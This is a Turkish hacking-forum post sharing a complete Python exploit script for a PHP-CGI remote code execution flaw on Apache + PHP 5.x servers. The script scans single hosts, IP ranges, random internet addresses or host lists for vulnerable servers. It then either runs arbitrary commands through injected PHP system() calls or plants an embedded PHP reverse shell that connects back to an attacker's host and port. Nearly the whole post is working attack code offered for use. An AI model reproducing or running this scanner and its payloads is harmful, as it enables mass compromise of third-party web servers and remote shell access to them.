Şifremi Unuttum?   -   Üye Ol





Elit Üyelik Bilgi Formu İçin Tıklayınız



Yeni Yorum Gönder 
 
Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner v2)
Yazar Konu
By_Amoras Çevrimdışı
Forum Üyesi
**

Yorum Sayısı: 33
Üyelik Tarihi: Nov 2013
Rep Puanı: 0
Yorum: #1
Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner v2)
Kod:
#!/usr/bin/env python
#
# ap-unlock-v2.py - apache + php 5.* rem0te c0de execution 0day (better version)
#
# NOTE:
#   - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE :(((
#   - for connect back shell start netcat/nc and bind port on given host:port
#   - is ip-range scanner not is multithreaded, but iz multithreaded iz in
#   random scanner and is scanner from file (greets to MustLive)
#   - no ssl support
#   - more php paths can be added
#   - adjust this shit for windows b0xes
#
# 2013
# by noptrix - http://nullsecurity.net/

import sys
import socket
import argparse
import threading
import time
import random
import select


NONE = 0
VULN = 1
SCMD = 2
XPLT = 3

t3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \
        '%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \
        '%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \
        '%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\
        '%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\r\nHost:localhost\r\n'\
        'Content-Type: text/html\r\nContent-Length:1\r\n\r\na\r\n'


def m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt):
    c0nn_b4ck = \
    '''
    <? set_time_limit (0); $VERSION = "1.0"; $ip = "''' + cb_h0st + '''";
    $port = ''' + cb_p0rt + '''; $chunk_size = 1400; $write_a = null;
    $error_a = null; $shell = "unset HISTFILE; id; /bin/sh -i"; $daemon = 0;
    $debug = 0; if (function_exists("pcntl_fork")) {$pid = pcntl_fork();
    if ($pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) {
    exit(1);}$daemon = 1;} else {print "bla";}chdir("/");umask(0);
    $sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {
    printit("$errstr ($errno)");exit(1);}$descriptorspec = array(
    0 => array("pipe", "r"), 1 => array("pipe", "w"),2 => array("pipe", "w"));
    $process = proc_open($shell, $descriptorspec, $pipes);
    if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0);
    stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);
    printit("Successfully opened reverse shell to $ip:$port");while (1) {
    if (feof($sock)) {printit("ERROR: Shell connection terminated");break;}
    if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");
    $input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");
    fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {
    if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);
    if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}
    if (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");
    $input = fread($pipes[2], $chunk_size);
    if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);
    fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);
    function printit ($string) {if (!$daemon) {print "$string\n";}}?>
    '''
    return c0nn_b4ck


def enc0dez():
    n33dz1 = ('cgi-bin', 'php')
    n33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d',
            'suhosin.simulation=on', '-d', 'disable_functions=""', '-d',
            'open_basedir=none', '-d', 'auto_prepend_file=php://input',
            '-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0',
            '-d', 'auto_prepend_file=php://input', '-n')
    fl4g = 0
    arg5 = ''
    p4th = ''
    plus = ''
  
    for x in n33dz2:
        if fl4g == 1:
            plus = '+'
        arg5 = arg5 + plus + \
                ''.join('%' + c.encode('utf-8').encode('hex') for c in x)
        fl4g = 1
    for x in n33dz1:
        p4th = p4th + '/' + \
                ''.join('%' + c.encode('utf-8').encode('hex') for c in x)
    return (p4th.upper(), arg5.upper())


def m4k3_p4yl0rd(p4yl0rd, m0de):
    p4th, arg5 = enc0dez()
    if m0de == VULN:
        p4yl0rd = t3st
    elif m0de == SCMD or m0de == XPLT:
        p4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\r\n' \
                'Host: ' + sys.argv[1] + '\r\n' \
                'Content-Type: application/x-www-form-urlencoded\r\n' \
                'Content-Length: ' + str(len(p4yl0rd)) + '\r\n\r\n' + p4yl0rd
    return p4yl0rd


def s3nd_sh1t(args, m0de, c0nn_b4ck):
    pat = '<b>Parse error</b>:'
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(float(args.t))
        res = s.connect_ex((args.h, int(args.p)))
        if res == 0:
            if m0de == VULN:
                p4yl0rd = m4k3_p4yl0rd('', m0de)
                s.sendall(p4yl0rd)
                if pat in s.recv(4096):
                    print "--> " + args.h + " vu1n"
                    return args.h
                else:
                    if args.v:
                        print "--> %s n0t vu1n" % (args.h)
                    return
            elif m0de == SCMD:
                p4yl0rd = m4k3_p4yl0rd('<? system("' + args.c + '"); ?>', m0de)
                s.sendall(p4yl0rd)
                rd, wd, ex = select.select([s], [], [], float(args.t))
                if rd:
                    for line in s.makefile():
                        print line,
            elif m0de == XPLT:
                p4yl0rd = m4k3_p4yl0rd(c0nn_b4ck, m0de)
                s.sendall(p4yl0rd)
        else:
            if args.v:
                print "--> n0 w3bs3rv3r 0n %s" % (args.h)
    except socket.error:
        return
    return


def m4k3_r4nd_1p4ddr(num):
    h0sts = []
    for x in range(int(num)):
        h0sts.append('%d.%d.%d.%d' % (random.randrange(0,255),
                random.randrange(0,255), random.randrange(0,255),
                random.randrange(0,255)))
    return h0sts


def sc4n_r4nd0m(args, h0st, m0de, vu1nz):
    args.h = h0st
    vu1nz.append(s3nd_sh1t(args, m0de, None))
    vu1nz = filter(None, vu1nz)
    return


def sc4n_fr0m_f1le(args, h0st, m0de, vu1nz):
    args.h = h0st.rstrip()
    vu1nz.append(s3nd_sh1t(args, m0de, None))
    vu1nz = filter(None, vu1nz)
    return


def sc4n_r4ng3(rsa, rsb, args, m0de):
    vu1nz = []
    for i in range (rsa[0], rsb[0]):
        for j in range (rsa[1], rsb[1]):
            for k in range (rsa[2], rsb[2]):
                for l in range(rsa[3], rsb[3]):
                    args.h = str(i) + "." + str(j) + "." + str(k) + "." + str(l)
                    vu1nz.append(s3nd_sh1t(args, m0de, None))
                    time.sleep(0.005)
    vu1nz = filter(None, vu1nz)
    return vu1nz


def m4k3_ipv4_r4ng3(iprange):
    a = tuple(part for part in iprange.split('.'))
    rsa = (range(4))
    rsb = (range(4))
    for i in range(0,4):
        ga = a[i].find('-')
        if ga != -1:
            rsa[i] = int(a[i][:ga])
            rsb[i] = int(a[i][1+ga:]) + 1                                      
        else:
            rsa[i] = int(a[i])
            rsb[i] = int(a[i]) + 1
    return (rsa, rsb)


def parse_args():
    p = argparse.ArgumentParser(
    usage='\n\n  ./ap-unlock-v2.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]'\
            '\n  ./ap-unlock-v2.py -r <4rg> | -R <4rg> | -i <4rg> [0pt1ons]',
    formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False)
    opts = p.add_argument_group('0pt1ons', '')
    opts.add_argument('-h', metavar='wh1t3h4tz.0rg',
            help='| t3st s1ngle h0st f0r vu1n')
    opts.add_argument('-p', default=80, metavar='80',
            help='| t4rg3t p0rt (d3fau1t: 80)')
    opts.add_argument('-c', metavar='\'uname -a;id\'',
            help='| s3nd c0mm4nds t0 h0st')
    opts.add_argument('-x', metavar='192.168.0.2:1337',
            help='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll')
    opts.add_argument('-s', action='store_true',
            help='| t3st s1ngl3 h0st f0r vu1n')
    opts.add_argument('-r', metavar='133.1.3-7.7-37',
            help='| sc4nz iP addr3ss r4ng3 f0r vu1n')
    opts.add_argument('-R', metavar='1337',
            help='| sc4nz num r4nd0m h0st5 f0r vu1n')
    opts.add_argument('-t', default=3, metavar='3',
            help='| t1me0ut in s3x (d3fau1t: 3)')
    opts.add_argument('-f', metavar='vu1n.lst',
            help='| wr1t3 vu1n h0sts t0 f1l3')
    opts.add_argument('-i', metavar='sc4nz.lst',
            help='| sc4nz h0sts fr0m f1le f0r vu1n')
    opts.add_argument('-S', metavar='2',
            help='| sl33pz in s3x b3tw33n thr3adz (d3fault: 2)')
    opts.add_argument('-T', default=2, metavar='4',
            help='| nuM sc4n thr3adz (d3fault: 4)')
    opts.add_argument('-v', action='store_true',
            help='| pr1nt m0ah 1nf0z wh1l3 sh1tt1ng')
    args = p.parse_args()
    if not args.h and not args.r and not args.R and not args.i:
        p.print_help()
        sys.exit(0)
    return args


def wr1te_fil3(args, vu1nz):
    if args.f:
        if vu1nz:
            try:
                f = open(args.f, "w")
                f.write("\n".join(vu1nz)+"\n")
                f.close()
            except:
                sys.stderr.write('de1n3 mudd1 k0cht guT')
                sys.stderr.write('\n')
                raise SystemExit()
    return


def c0ntr0ller():
    vu1nz = []
    m0de = NONE
    try:
        args = parse_args()
        if not args.t:
            args.t = float(3)
        if args.h:
            if args.s:
                print "[+] sc4nn1ng s1ngl3 h0st %s " % (args.h)
                m0de = VULN
                s3nd_sh1t(args, m0de, None)
            elif args.c:
                print "[+] s3nd1ng c0mm4ndz t0 h0st %s " % (args.h)
                m0de = SCMD
                s3nd_sh1t(args, m0de, None)
            elif args.x:
                print "[+] xpl0it1ng b0x %s " % (args.h)
                m0de = XPLT
                if args.x.find(':') != -1:
                    if not args.x.split(':')[1]:
                        print "[-] 3rr0r: p0rt m1ss1ng"
                    else:
                        cb_h0st = args.x.split(':')[0]
                        cb_p0rt = args.x.split(':')[1]
                else:
                    print "[-] 3rr0r: <h0st>:<p0rt> y0u l4m3r"
                c0nn_b4ck = m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt)
                s3nd_sh1t(args, m0de, c0nn_b4ck)
            else:
                print "[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch"
                sys.exit(-1)
        if args.r:
            print "[+] sc4nn1ng r4ng3 %s " % (args.r)
            m0de = VULN
            rsa, rsb = m4k3_ipv4_r4ng3(args.r)
            vu1nz = sc4n_r4ng3(rsa, rsb, args, m0de)
        if args.R:
            print "[+] sc4nn1ng %d r4nd0m b0xes" % (int(args.R))
            m0de = VULN
            if not args.S:
                args.S = float(2)
            h0sts = m4k3_r4nd_1p4ddr(int(args.R))
            for h0st in h0sts:
                try:
                    t = threading.Thread(target=sc4n_r4nd0m, args=(args, h0st,
                        m0de, vu1nz))
                    t.start()
                    time.sleep(float(args.S))
                    while threading.activeCount() > int(args.T):
                        time.sleep(2)
                except:
                    sys.stdout.flush()
                    sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")
                    raise SystemExit
        if args.i:
            print "[+] sc4nn1ng b0xes fr0m f1le %s" % (args.i)
            m0de = VULN
            h0sts = tuple(open(args.i, 'r'))
            if not args.S:
                args.S = float(2)
            for h0st in h0sts:
                try:
                    t = threading.Thread(target=sc4n_fr0m_f1le, args=(args,
                        h0st, m0de, vu1nz))
                    t.start()
                    time.sleep(float(args.S))
                    while threading.activeCount() > int(args.T):
                        time.sleep(2)
                except KeyboardInterrupt:
                    sys.stdout.flush()
                    sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")
                    raise SystemExit
            #sc4n_fr0m_f1le(args, h0sts, m0de, vu1nz)
    except KeyboardInterrupt:
        sys.stdout.flush()
        sys.stderr.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")
        raise SystemExit
    wr1te_fil3(args, vu1nz)

    return


def m41n():
    if  __name__ == "__main__":
        print "--==[ ap-unlock-v2.py by noptrix@nullsecurity.net ]==--"
        c0ntr0ller()
    else:
        print "[-] 3rr0r: y0u fuck3d up dud3"
        sys.exit(1)
    print "[+] h0p3 1t h3lp3d"


# \o/ fr33 requiem 1337 h4x0rs ...
m41n()

# e0F
(Bu konu en son: 11-06-2013 Tarihinde, Saat: 22:24 düzenlenmiştir. Düzenleyen: By_Amoras.)
11-06-2013 22:23
Web Sitesini Ziyaret Et Tüm Mesajlarına Bak Alıntı ile Cevapla
Yeni Yorum Gönder 


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  NAS4Free Arbitrary Remote Code Execution By_Amoras 0 1,666 11-06-2013 22:25
Son Yorum: By_Amoras
  vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution By_Amoras 0 1,420 11-06-2013 22:25
Son Yorum: By_Amoras

Hızlı Menü:


Şu anda bu konuyu okuyanlar: 1 Ziyaretçi

İletişim | CesurForum | Yukarı Git | İçeriğe Git | Arşiv | RSS Beslemesi



Bu Web Sitesi Zumbak Hosting Tarafindan Barındırılmaktadır.


5651 Sayılı Kanun’un 8. maddesine ve T.C.K’nın 125. maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. Sitemiz, hukuka, yasalara, telif haklarına ve kişilik haklarına saygılı olmayı amaç edinmiştir. Sitemiz, 5651 sayılı yasada tanımlanan “yer sağlayıcı” olarak hizmet vermektedir. İlgili yasaya göre, site yönetiminin hukuka aykırı içerikleri kontrol etme yükümlülüğü YOKTUR!Bu sebeple, sitemiz “uyar ve kaldır” prensibini benimsemiştir. Telif hakkına konu olan eserlerin yasal olmayan bir biçimde paylaşıldığını ve yasal haklarının çiğnendiğini düşünen hak sahipleri veya meslek birlikleri, BURADAN bize ulaşabilirler. Buraya ulaşan talep ve şikayetler Hukuk Müşavirimiz tarafından incelenecek, şikayet yerinde görüldüğü takdirde ihlal olduğu düşünülen içerikler sitemizden kaldırılacaktır.Ayrıca, mahkemelerden talep gelmesi halinde hukuka aykırı içerik üreten ve hukuka aykırı paylaşımda bulunan üyelerin tespiti için gerekli teknik veriler sağlanacaktır.Sitemiz üzerinden yapılan satış ilanları sadece firmalar için olup, kötüye kullanımından doğacak hasarlardan kesinlikle sitemiz sorumlu tutulamaz.